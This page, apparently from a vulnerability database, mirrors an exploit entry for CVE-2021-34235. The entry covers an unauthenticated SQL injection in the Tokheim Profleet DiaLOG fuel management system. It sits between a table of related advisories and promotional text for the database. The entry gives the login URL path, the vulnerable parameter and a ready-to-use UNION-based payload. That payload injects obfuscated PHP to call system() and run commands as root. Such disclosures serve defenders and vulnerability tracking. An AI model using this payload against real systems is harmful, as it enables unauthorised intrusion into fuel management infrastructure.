| Reporter | Title | Published | Views | Family All 10 |
|---|---|---|---|---|
| Tokheim Profleet DiaLOG Fuel Management System 11.005.02 SQLi / Code Execution Vulnerabilities | 10 Feb 202200:00 | – | zdt | |
| TSG Tokheim Profleet DiaLOG Fuel Management System SQL注入漏洞 | 10 Feb 202200:00 | – | cnnvd | |
| TSG Tokheim Profleet DiaLOG Fuel Management System SQL Injection Vulnerability | 14 Feb 202200:00 | – | cnvd | |
| CVE-2021-34235 | 11 Feb 202217:41 | – | cve | |
| CVE-2021-34235 | 11 Feb 202217:41 | – | cvelist | |
| EUVD-2021-20897 | 7 Oct 202500:30 | – | euvd | |
| CVE-2021-34235 | 11 Feb 202218:15 | – | nvd | |
| Sql injection | 11 Feb 202218:15 | – | prion | |
| PT-2022-10327 · Tokheim · Tokheim Profleet Dialog | 11 Feb 202200:00 | – | ptsecurity | |
| CVE-2021-34235 | 22 May 202518:39 | – | redhatcve |
`# Exploit Title: Tokheim Profleet DiaLOG Fuel Management System 11.005.02 - SQLi (Unauthenticated)
# Date: 02/9/2022
# Exploit Author: golem445
# Vendor Homepage: https://www.tsg-solutions.com
# Tested on: Kali Linux
# CVE: CVE-2021-34235
# Description: Field__UserLogin parameter is vulnerable to crafted MySQL injection, resulting in remote code execution as root.
==Steps to Reproduce==
# Go to : http://dialog_host/login.php
# Enter escaped MySQL query into the username field and submit, passwords doesn't matter. (Such as: ' /*!50000union*/ select 1,2,3,4,5,6,7,8,’data://text/plain,<?php $a=”sy”;$b=”stem”;$c=$a.$b; $c(“uname -a”);?>’ -- -)
# This can also be accomplished via intercepting the logon submission with Burp Proxy, then entering your MySQL query into the Field_UserLogin parameter.
==Notes==
This vulnerability appears rooted in a logic flaw. Typical authentication logic flow is a user submitting their credentials, authentication success/failure occurs, followed with results being noted in a log. This application appears to work inversely, i.e. logon attempt is logged, then the users credentials are checked.
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation